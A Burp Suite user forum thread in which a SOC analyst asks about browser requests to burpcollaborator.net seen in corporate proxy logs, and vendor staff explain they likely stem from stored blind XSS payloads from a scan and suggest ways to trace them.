Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Call to xxxxxx.burpcollaborator.net in corporate proxies logs from browsers

FTR | Last updated: Apr 02, 2019 07:55AM UTC

Hello I work in a SOC, and i recently discover call to xxxxxx.burpcollaborator.net (about 6 subdomains) in our proxies logs. When i looked in the nexthink logs, i can see that all the request came from browsers and not burp suite. Since we don't intercept SSL i can't see what is the referer, but is it possible that a site initiate requests to burpcollaborator ? If yes, in wich scenario can we see that kind of request ? Thanks for your help to understand what's going on

PortSwigger Agent | Last updated: Apr 02, 2019 09:39AM UTC

Did you check the User-Agent header to determine requests came from browsers? If so, be aware that Burp uses the same header as Chrome 69 on Windows by default. So the requests could be from Burp. Another reason this can happen is that during a Burp scan, blind XSS payloads are submitted, and you could be witnessing later execution of these payloads by another user who browses the site. Without the referer this will be difficult to follow up in a SOC, but you could contact the relevant user to inquire if they're using Burp.

Burp User | Last updated: Apr 02, 2019 09:56AM UTC

Hello Thanks a lot for your feedback. I have 3 users, all of them doesn't even understand what is burp, and there's no way that's they use it.I contacted all of them, and their technical IT skills are low. I used Nexthink ( to check what process is doing the request, and it's Chrome or Firefox. Then i checked in proxies logs, and find out that the user agent is the same than "regular" web surfing from this user. The only common point beetween this 3 users, is that they are working in the same services, and use the same tools (wich is a famous DMP pure player) Is it possible that some use burpcollaborator.net in another way than using burp suite ? Thanks again

PortSwigger Agent | Last updated: Apr 02, 2019 10:20AM UTC

Hi, In that case, it's highly likely one of the web apps they work with has a blind XSS vulnerability, and someone has scanned this using Burp and the blind XSS payloads have been injected. That person could be an authorized pen tester, or is potentially a malicious - or, at least, unauthorized - user of your services. If it's possible to search the app's data for the string "burpcollaborator.net" this could identify where this has happened. Alternatively, if you can turn on referrer logging for these users (perhaps using a logging browser extension), that may identify where the requests are being triggered.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.